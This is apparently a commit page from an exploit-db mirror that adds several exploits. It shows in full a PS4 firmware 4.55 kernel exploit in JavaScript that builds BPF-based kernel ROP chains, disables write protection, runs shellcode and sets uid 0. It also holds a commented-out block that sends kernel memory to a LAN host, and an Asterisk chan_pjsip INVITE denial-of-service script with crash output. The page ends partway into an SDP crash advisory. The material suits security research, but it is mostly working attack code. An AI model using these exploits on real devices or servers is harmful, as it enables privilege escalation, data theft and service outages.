bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-02-28

Browse source 
16 changes to exploits/shellcodes

Transmission - Integer Overflows Parsing Torrent Files
Chrome V8 - 'PropertyArray' Integer Overflow
Chrome V8 - 'TranslatedState::MaterializeCapturedObjectAt' Type Confusion
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service
Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service
Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption
Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service

Sony Playstation 4 4.55 FW - Local Kernel

GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)
Schools Alert Management Script 2.0.2 - Authentication Bypass
MyBB My Arcade Plugin 1.3 - Cross-Site Scripting
Joomla! Component K2 2.8.0 - Arbitrary File Download
School Management Script 3.0.4 - Authentication Bypass
CMS Made Simple 2.1.6 - Remote Code Execution
Concrete5 < 8.3.0 - Username / Comments Enumeration
This commit is contained in:
Offensive Security 2018-02-28 05:01:52 +00:00
parent d0ed4bb0d2
commit 5d48f0abd2
17 changed files with 1985 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

562
exploits/bsd/local/44177.c Normal file
View file

@ -0,0 +1,562 @@
function stage4_()
{
function malloc(sz)
{
var backing = new Uint8Array(1000+sz);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz)
{
var backing = new Uint8Array(0x1000+sz*4);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
var strcpy_helper = new Uint8Array(0x1000);
var where_writeptr_strcpy = p.leakval(strcpy_helper).add32(0x10);
function strcpy(ptr, str)
{
p.write8(where_writeptr_strcpy, ptr);
for (var i = 0; i < str.length; i++)
strcpy_helper[i] = str.charCodeAt(i) & 0xFF;
strcpy_helper[str.length] = 0;
}
var sysctlbyname = window.libKernelBase.add32(0xF290);
var sysreq = malloc32(0x10);
sysreq.backing[0] = 7;
sysreq.backing[1] = 0;
sysreq.backing[4] = 0x10;
var retv = malloc(0x100);
var __errno_ptr = p.fcall(window.libKernelBase.add32(0x2BE0));
var rv = p.fcall(sysctlbyname, p.sptr("machdep.openpsid"), retv, sysreq.add32(0x10), 0, 0);
var str = "";
for (var i=0; i<0x10; i++)
{
str += zeroFill(retv.backing[i].toString(16),2) + " ";
}
// log("psid: " + str)
var fd = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
var fd1 = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
if (fd == (-1 >>> 0))
{
print("kexp failed: no bpf0");
}
// print("fd: " + fd);
var scratch = malloc(0x100);
var ifname = malloc(0x10);
strcpy(ifname, "wlan0");
p.syscall("ioctl", fd, 0x8020426c, ifname);
var ret = p.syscall("write", fd, scratch, 40);
if (ret.low == (-1 >>> 0))
{
strcpy(ifname, "eth0");
p.syscall("ioctl", fd, 0x8020426c, ifname);
var ret = p.syscall("write", fd, scratch, 40);
if (ret.low == (-1 >>> 0))
{
throw "kexp failed :(";
}
}
var assertcnt = 0;
var assert = function(x)
{
assertcnt++;
if (!x) throw "assertion " + assertcnt + " failed";
}
print("got it");
var bpf_valid = malloc32(0x4000);
var bpf_valid_u32 = bpf_valid.backing;
var bpf_valid_prog = malloc(0x40);
p.write8(bpf_valid_prog, 64)
p.write8(bpf_valid_prog.add32(8), bpf_valid)
for (var i = 0 ; i < 0x4000; )
{
bpf_valid_u32[i++] = 6; // BPF_RET
bpf_valid_u32[i++] = 0;
}
var bpf_invalid = malloc32(0x4000);
var bpf_invalid_u32 = bpf_invalid.backing;
var bpf_invalid_prog = malloc(0x40);
p.write8(bpf_invalid_prog, 64)
p.write8(bpf_invalid_prog.add32(8), bpf_invalid)
for (var i = 0 ; i < 0x4000; )
{
bpf_invalid_u32[i++] = 4; // NOP
bpf_invalid_u32[i++] = 0;
}
var push_bpf = function(bpfbuf, cmd, k)
{
var i = bpfbuf.i;
if (!i) i=0;
bpfbuf[i*2] = cmd;
bpfbuf[i*2+1] = k;
bpfbuf.i = i+1;
}
push_bpf(bpf_invalid_u32, 5, 2); // jump
push_bpf(bpf_invalid_u32, 0x12, 0); // invalid opcode
bpf_invalid_u32.i = 16;
var bpf_write8imm = function(bpf, offset, imm)
{
if (!(imm instanceof int64))
{
imm = new int64(imm,0);
}
push_bpf(bpf, 0, imm.low); // BPF_LD|BPF_IMM
push_bpf(bpf, 2, offset); // BPF_ST
push_bpf(bpf, 0, imm.hi); // BPF_LD|BPF_IMM
push_bpf(bpf, 2, offset+1); // BPF_ST -> RDI: pop rsp
}
var bpf_copy8 = function(bpf, offset_to, offset_from)
{
push_bpf(bpf, 0x60, offset_from); // BPF_LD|BPF_MEM
push_bpf(bpf, 2, offset_to); // BPF_ST
push_bpf(bpf, 0x60, offset_from+1); // BPF_LD|BPF_MEM
push_bpf(bpf, 2, offset_to+1); // BPF_ST
}
var bpf_add4 = function(bpf, offset, val)
{
push_bpf(bpf, 0x60, offset); // BPF_LD
push_bpf(bpf, 0x4, val); // BPF_ALU|BPF_ADD|BPF_K
push_bpf(bpf, 2, offset); // BPF_ST
}
var krop_off_init = 0x1e;
var krop_off = krop_off_init;
var reset_krop = function() {
krop_off = krop_off_init;
bpf_invalid_u32.i = 16;
}
var push_krop = function(value)
{
bpf_write8imm(bpf_invalid_u32, krop_off, value);
krop_off += 2;
}
var push_krop_fromoff = function(value)
{
bpf_copy8(bpf_invalid_u32, krop_off, value);
krop_off += 2;
}
var finalize_krop = function(retv)
{
if(!retv) retv = 5;
push_bpf(bpf_invalid_u32, 6, retv); // return 5
}
var rtv = p.syscall("ioctl", fd, 0x8010427B, bpf_valid_prog);
assert(rtv.low == 0);
rtv = p.syscall("write", fd, scratch, 40);
assert(rtv.low == (-1 >>> 0));
var kscratch = malloc32(0x80);
var kchain = new window.RopChain();
kchain.clear();
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
kchain.push(window.webKitBase.add32(0x3EBD0));
reset_krop();
//push_krop(window.gadgets["infloop"]); // 8
bpf_copy8(bpf_invalid_u32, 0, 0x1e);
push_krop(window.gadgets["pop rsi"]); // 0x10
push_krop_fromoff(0);
push_krop(window.gadgets["pop rsp"]);
push_krop(kchain.ropframeptr); // 8
finalize_krop(0);
var spawnthread = function(chain) {
/*
seg000:00000000007FA7D0 sub_7FA7D0 proc near ; DATA XREF: sub_7F8330+5Eo
seg000:00000000007FA7D0 55 push rbp
seg000:00000000007FA7D1 48 89 E5 mov rbp, rsp
seg000:00000000007FA7D4 41 56 push r14
seg000:00000000007FA7D6 53 push rbx
seg000:00000000007FA7D7 48 89 F3 mov rbx, rsi
seg000:00000000007FA7DA 49 89 FE mov r14, rdi
seg000:00000000007FA7DD 48 8D 35 E5 B3 EC 00 lea rsi, aMissingPlteBef ; "Missing PLTE before tRNS" < search this
-> xref of sub_7FA7D0:
seg000:00000000007F8380 48 8D 3D 28 D8 EC 00 lea rdi, a1_5_18_0 ; "1.5.18"
seg000:00000000007F8387 48 8D 15 82 23 00 00 lea rdx, sub_7FA710
seg000:00000000007F838E 48 8D 0D 3B 24 00 00 lea rcx, sub_7FA7D0
seg000:00000000007F8395 31 F6 xor esi, esi
seg000:00000000007F8397 49 C7 47 20 00 00 00 00 mov qword ptr [r15+20h], 0
seg000:00000000007F839F 66 41 C7 47 18 00 00 mov word ptr [r15+18h], 0
seg000:00000000007F83A6 49 C7 47 10 00 00 00 00 mov qword ptr [r15+10h], 0
seg000:00000000007F83AE E8 8D 3C D3 00 call sub_152C040
-> code:
m_png = png_create_read_struct(PNG_LIBPNG_VER_STRING, 0, decodingFailed, decodingWarning);
decodingWarning -> sub_7FA7D0 (where Missing PLTE before tRNS is referenced)
decodingFailed -> contains longjmp (which we want)
seg000:00000000007FA710 sub_7FA710 proc near ; DATA XREF: sub_7F8330+57o
seg000:00000000007FA710 ; sub_7F9DC0+2Eo
seg000:00000000007FA710 55 push rbp
seg000:00000000007FA711 48 89 E5 mov rbp, rsp
seg000:00000000007FA714 48 8B 35 5D B6 E5 02 mov rsi, cs:qword_3655D78
seg000:00000000007FA71B BA 60 00 00 00 mov edx, 60h ; '`'
seg000:00000000007FA720 E8 AB E6 D2 00 call sub_1528DD0
seg000:00000000007FA725 BE 01 00 00 00 mov esi, 1
seg000:00000000007FA72A 48 89 C7 mov rdi, rax
seg000:00000000007FA72D E8 26 6D 80 FF call sub_1458 < longjmp
seg000:00000000007FA732 0F 0B ud2
seg000:00000000007FA732 sub_7FA710 endp
*/
var longjmp = webKitBase.add32(0x1458);
// ThreadIdentifier createThread(ThreadFunction entryPoint, void* data, const char* name)
/*
seg000:00000000001DD17F 48 8D 15 C9 38 4C 01 lea rdx, aWebcoreGccontr ; "WebCore: GCController" < search this
seg000:00000000001DD186 31 F6 xor esi, esi
seg000:00000000001DD188 E8 B3 1B F9 00 call sub_116ED40 < createThread
*/
var createThread = window.webKitBase.add32(0x116ED40);
var contextp = malloc32(0x2000);
var contextz = contextp.backing;
contextz[0] = 1337;
var thread2 = new RopChain();
thread2.clear();
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
chain(thread2);
p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
p.write8(contextp.add32(0x10), thread2.ropframeptr); // rsp
p.fcall(createThread, longjmp, contextp, p.sptr("GottaGoFast"));
window.nogc.push(contextz);
window.nogc.push(thread2);
return thread2;
}
var interrupt1 = 0;
var interrupt2 = 0;
// ioctl() with valid BPF program -> will trigger reallocation of BFP code alloc
spawnthread(function(thread2){
interrupt1 = thread2.ropframeptr;
thread2.push(window.gadgets["pop rdi"]); // pop rdi
thread2.push(fd); // what
thread2.push(window.gadgets["pop rsi"]); // pop rsi
thread2.push(0x8010427B); // what
thread2.push(window.gadgets["pop rdx"]); // pop rdx
thread2.push(bpf_valid_prog); // what
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr.add32(0x800)); // what
thread2.count = 0x100;
var cntr = thread2.count;
thread2.push(window.syscalls[54]); // ioctl
thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr); // what
})
// ioctl() with invalid BPF program -> this will be executed when triggering bug
spawnthread(function(thread2){
interrupt2 = thread2.ropframeptr;
thread2.push(window.gadgets["pop rdi"]); // pop rdi
thread2.push(fd1); // what
thread2.push(window.gadgets["pop rsi"]); // pop rsi
thread2.push(0x8010427B); // what
thread2.push(window.gadgets["pop rdx"]); // pop rdx
thread2.push(bpf_invalid_prog); // what
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr.add32(0x800)); // what
thread2.count = 0x100;
var cntr = thread2.count;
thread2.push(window.syscalls[54]); // ioctl
thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr); // what
})
function kernel_rop_run(cb)
{
kchain.clear();
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
kchain.push(window.gadgets["ret"]);
cb(kchain);
kchain.push(window.gadgets["pop rax"]);
kchain.push(0);
kchain.push(window.gadgets["ret"]);
kchain.push(window.webKitBase.add32(0x3EBD0));
while(1)
{
if (p.syscall(4, fd, scratch, 40).low == 40)
{
return p.read8(kscratch);
break;
}
}
}
function leak_kern_rip() {
return kernel_rop_run(function(kchain)
{
kchain.push(window.gadgets["pop rdi"]);
kchain.push(kscratch);
kchain.push(window.gadgets["mov [rdi], rsi"]);
});
}
function kernel_read8(addr) {
return kernel_rop_run(function(kchain)
{
kchain.push(window.gadgets["pop rdi"]);
kchain.push(addr);
kchain.push(window.webKitBase.add32(0x13A220)); // deref
kchain.push(window.gadgets["pop rdi"]);
kchain.push(kscratch);
kchain.push(window.gadgets["mov [rdi], rax"]);
});
}
function kernel_memcpy(to,from,size) {
return kernel_rop_run(function(kchain)
{
kchain.push(window.gadgets["pop rdi"]);
kchain.push(to);
kchain.push(window.gadgets["pop rsi"]);
kchain.push(from);
kchain.push(window.gadgets["pop rdx"]);
kchain.push(size);
kchain.push(window.gadgets["memcpy"]);
kchain.push(window.gadgets["mov [rdi], rax"]);
});
}
var kern_base = leak_kern_rip();
kern_base.low &= 0xffffc000;
kern_base.low -= 0x164000;
log("ay! " + kernel_read8(kern_base) + " " + kern_base);
/*
var chunksz = 0x40000;
var pagebuf = malloc(chunksz);
connection = new WebSocket('ws://192.168.0.125:8080');
connection.binaryType = "arraybuffer";
connection.onmessage = function() {
try {
kernel_memcpy(pagebuf, kern_base, chunksz);
connection.send(new Uint8Array(pagebuf.backing.buffer, 0, chunksz));
kern_base.add32inplace(chunksz);
}catch(e) {log(e);}
}
LOAD:FFFFFFFF9144CF70 0F 20 C0 mov rax, cr0
LOAD:FFFFFFFF9144CF73 48 0D 2A 00 05 00 or rax, 5002Ah
LOAD:FFFFFFFF9144CF79 0F 22 C0 mov cr0, rax
LOAD:FFFFFFFF9144CF7C C3 retn
FFFFFFFF91562A58
*/
var getset_cr0 = kern_base.add32(0x280f70);
var set_cr0 = kern_base.add32(0x280f79);
function kernel_get_cr0() {
return kernel_rop_run(function(kchain)
{
kchain.push(getset_cr0);
kchain.push(window.gadgets["pop rdi"]);
kchain.push(kscratch);
kchain.push(window.gadgets["mov [rdi], rax"]);
});
}
var cr0val = kernel_get_cr0();
cr0val.low &= ((~(1 << 16)) >>> 0);
log("cr0: " + cr0val);
function kernel_write8_cr0(addr, val) {
return kernel_rop_run(function(kchain)
{
kchain.push(window.gadgets["pop rax"]);
kchain.push(cr0val);
kchain.push(set_cr0);
kchain.push(window.gadgets["pop rdi"]);
kchain.push(addr);
kchain.push(window.gadgets["pop rax"]);
kchain.push(val);
kchain.push(window.gadgets["mov [rdi], rax"]);
kchain.push(getset_cr0);
});
}
function kernel_fcall(addr, arg0, arg1) {
return kernel_rop_run(function(kchain)
{
if(arg0)
{
kchain.push(window.gadgets["pop rdi"]);
kchain.push(arg0);
}
if(arg1)
{
kchain.push(window.gadgets["pop rsi"]);
kchain.push(arg1);
}
kchain.push(addr);
kchain.push(window.gadgets["pop rdi"]);
kchain.push(kscratch);
kchain.push(window.gadgets["mov [rdi], rax"]);
});
}
var mprotect_patchloc = kern_base.add32(0x396a58);
var mprotect_patchbytes = kernel_read8(mprotect_patchloc);
var mprotect_realbytes = mprotect_patchbytes;
log("patchbytes: " + mprotect_patchbytes);
mprotect_patchbytes.low = 0x90909090;
mprotect_patchbytes.hi &= 0xffff0000;
mprotect_patchbytes.hi |= 0x00009090;
var shellsize = window.shellcode.byteLength;
shellsize += 0x4000;
shellsize &= 0xffffc000;
var shellscratch_to = malloc32((0x10000 + shellsize)/4);
var origin_to = shellscratch_to.low;
shellscratch_to.low &= 0xffffc000;
shellscratch_to.low += 0x8000;
var offset = (shellscratch_to.low - origin_to) / 4;
for (var i=0; i < window.shellcode.length; i++)
{
shellscratch_to.backing[i+offset] = window.shellcode[i];
}
kernel_write8_cr0(mprotect_patchloc,mprotect_patchbytes);
var mapz = p.syscall("mprotect", shellscratch_to, shellsize, 7);
kernel_write8_cr0(mprotect_patchloc,mprotect_realbytes);
if (mapz.low != 0) throw "mprot fail!";
faultme = shellscratch_to.add32(0x0);
for (var i=0; i < window.shellcode.length; i+= 0x1000)
{
var bck = p.read8(faultme);
p.write8(faultme, 0xc3)
p.fcall(faultme); // test faulting
p.write8(faultme, bck)
}
p.syscall("mlock", shellscratch_to, shellsize);
var pyld_buf = p.read8(p.leakval(window.pyld).add32(0x10));
var zarguments = malloc32(0x1000);
p.write8(zarguments, kern_base);
p.write8(zarguments.add32(8), fd_kcall);
p.write8(zarguments.add32(16), interrupt1);
p.write8(zarguments.add32(24), interrupt2);
p.write8(zarguments.add32(32), window.syscalls[431]);
p.write8(zarguments.add32(40), window.syscalls[591]);
p.write8(zarguments.add32(48), window.syscalls[594]);
p.write8(zarguments.add32(56), pyld_buf); // pyld
p.write8(zarguments.add32(64), window.pyldpoint);
p.write8(zarguments.add32(72), window.pyld.byteLength);
var fd_kcall = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
log(p.read8(shellscratch_to.add32(window.entrypoint)));
log("kernel shellcode: " + kernel_fcall(shellscratch_to.add32(window.entrypoint), 1, zarguments));
p.syscall("setuid", 0);
log("uid: " + p.syscall("getuid"));
alert("enter user");
log("user shellcode: " + p.fcall(shellscratch_to.add32(window.entrypoint), 2, zarguments));
var lsscrtch32 = new Uint32Array(0x400);
var lsscrtch = p.read8(p.leakval(lsscrtch32).add32(0x10));
window.ls = function(path)
{
var sep = "/"
if (path[path.length-1]=="/") sep = "";
var fd = p.syscall("open", p.sptr(path), 0x1100004).low;
if (fd == (-1 >>> 0))
{
print("open("+path+"): -1");
return;
}
alert("getdenv");
print("Directory listing for " +path+":");
var total = p.syscall("getdents", fd, lsscrtch, 0x1000).low;
if (total == (-1 >>> 0))
{
print("getdents("+path+"): -1");
return;
}
alert("got denv");
var offset = 0;
while (offset < total)
{
var cur = lsscrtch.add32(offset);
var reclen = p.read4(cur.add32(4)) & 0xFFFF;
var filepath = path + sep + p.readstr(cur.add32(8));
print("<a href=javascript:window.ls('" + filepath + "');>" + filepath + "</a>");
offset += reclen;
if(!reclen) break;
}
p.syscall("close", fd);
}
print("<a href=javascript:window.ls('/');>ls /</a>");
}

224
exploits/linux/dos/44181.py Executable file
View file

@ -0,0 +1,224 @@
'''
# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport
- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`
- References: AST-2018-005, CVE-2018-7286
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>
- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5
- Timeline:
- Issue reported to vendor: 2018-01-24
- Vendor patch made available to us: 2018-02-05
- Vendor advisory published: 2018-02-21
- Enable Security advisory: 2018-02-22
## Description
A crash occurs when a number of INVITE messages are sent over TCP or TLS and
then the connection is suddenly closed. This issue leads to a segmentation fault.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use.
## How to reproduce the issue
The following script was used to reproduce the issue on a TLS connection:
'''
python
import md5
import re
import socket
import ssl
import uuid
from time import sleep
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5061
USERNAME = "3000"
PASSWORD = "3000"
INVITE_USERNAME = "3000"
errno = 0
lasterrno = 0
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_TLSv1,
)
sock.connect((SERVER_IP, SERVER_PORT))
sock.settimeout(0.5)
errno = 0
callid = str(uuid.uuid4())
for ix in range(10):
sdpbody = ""
msg = "INVITE sip:%s@%s:%i SIP/2.0\r\n" \
"To: <sip:%s@%s:%i>\r\n" \
"From: Test <sip:%s@%s:%s>\r\n" \
"Call-ID: %s\r\n" \
"CSeq: 2 INVITE\r\n" \
"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
"Contact: <sip:%s@172.17.0.1>\r\n" \
"Content-Type: application/sdp\r\n" \
"{{AUTH}}" \
"Content-Length: %i\r\n" \
"\r\n" % (
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
USERNAME, SERVER_IP, SERVER_PORT,
callid, callid,
USERNAME, len(sdpbody)
) + \
sdpbody
sock.sendall(msg.replace("{{AUTH}}", ""))
data = sock.recv(10240)
# print(data)
if data.startswith("SIP/2.0 401"):
for line in data.split('\r\n'):
if line.startswith("WWW-Authenticate"):
content = line.split(':', 2)[1].strip()
realm = re.search(
"realm=\"([a-z]+)\"", content).group(1)
nonce = re.search(
"nonce=\"([a-z0-9\/]+)\"", content).group(1)
ha1 = md5.new(USERNAME + ":" + realm +
":" + PASSWORD).hexdigest()
uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
ha2 = md5.new("INVITE:" + uri).hexdigest()
r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()
auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
"realm=\"%s\"," % (realm) + \
"nonce=\"%s\"," % (nonce) + \
"uri=\"%s\"," % (uri) + \
"response=\"%s\"," % (r) + \
"algorithm=md5\r\n"
print(auth)
sock.sendall(msg.replace("{{AUTH}}", auth))
errno = 0
except (socket.error, ssl.SSLEOFError), err:
print(err)
print("getting close!")
sleep(2)
errno += 1
if errno >= 10:
print("confirmed dead")
break
elif errno > lasterrno:
lasterrno = errno
continue
'''
The output from the tool should show the following:
```
> python test.py
Authorization: Digest username="3000",realm="asterisk",nonce="1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae",uri="sip:127.0.0.1:5061",response="a2b7e2bfa722730b64787664db474f2a",algorithm=md5
EOF occurred in violation of protocol (_ssl.c:590)
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
confirmed dead
```
Notes:
- authentication may be required
- the destination SIP address should match a valid extension in the dialplan
- similar code to the above can be used to reproduce the issue on TCP transport
### GDB backtrace result
```
gdb --args /opt/asterisk/sbin/asterisk -fcvvv
Thread 25 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff030a700 (LWP 133)]
ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {
(gdb) bt
#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455
#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317
#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890
#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717
#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066
#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)
at ../src/pjsip/sip_transaction.c:1267
#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970
#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721
#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)
at res_pjsip/pjsip_resolver.c:527
#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209
#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164
#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,
cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796
#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237
#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704
#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634
#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789
#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531
#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231
#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712
#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963
#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062
#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126
#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,
p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893
#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903
#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963
#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322
#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963
#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351
#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105
#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024
#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257
#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333
#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''

190
exploits/linux/dos/44182.py Executable file
View file

@ -0,0 +1,190 @@
'''
# Segmentation fault occurs in Asterisk with an invalid SDP media format description
- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip`
- References: AST-2018-002
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-03-asterisk-pjsip-sdp-invalid-media-format-description-segfault>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-002.html>
- Tested vulnerable versions: 13.10.0, 15.1.3, 15.1.4, 15.1.5, 15.2.0
- Timeline:
- Report date: 2018-01-15
- Vendor patch made available to us: 2018-02-05
- Vendor advisory published: 2018-02-21
- Enable Security advisory: 2018-02-22
## Description
A specially crafted SDP message body with an invalid media format description causes a segmentation fault in asterisk using `chan_pjsip`.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when `chan_pjsip` is in use.
## How to reproduce the issue
The following SIP message was used to reproduce the issue:
```
INVITE sip:5678@127.0.0.1:5060 SIP/2.0
To: <sip:5678@127.0.0.1:5060>
From: Test <sip:5678@127.0.0.1:5060>
